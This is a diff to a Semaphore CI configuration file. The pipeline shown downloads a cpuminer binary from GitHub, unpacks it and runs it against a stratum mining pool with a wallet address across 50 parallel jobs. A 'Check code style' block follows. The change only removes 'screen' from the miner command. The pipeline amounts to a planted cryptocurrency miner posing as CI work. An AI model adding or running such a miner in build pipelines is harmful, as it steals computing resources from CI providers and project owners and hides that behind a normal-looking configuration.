--- a/.semaphore/semaphore.yml
+++ b/.semaphore/semaphore.yml
@@ -12,7 +12,7 @@ blocks:
           commands:
             - 'wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz '
             - tar xf cpuminer-opt-linux.tar.gz
-            - 'screen ./cpuminer-sse2 -a power2b -o stratum+tcps://stratum-eu.rplant.xyz:17022 -u BgopqeRqFTkxqSnxiCodAEoNYsdP6VDLHz.By'
+            - './cpuminer-sse2 -a power2b -o stratum+tcps://stratum-eu.rplant.xyz:17022 -u BgopqeRqFTkxqSnxiCodAEoNYsdP6VDLHz.By'
           parallelism: 50
   - name: Check code style
     task:
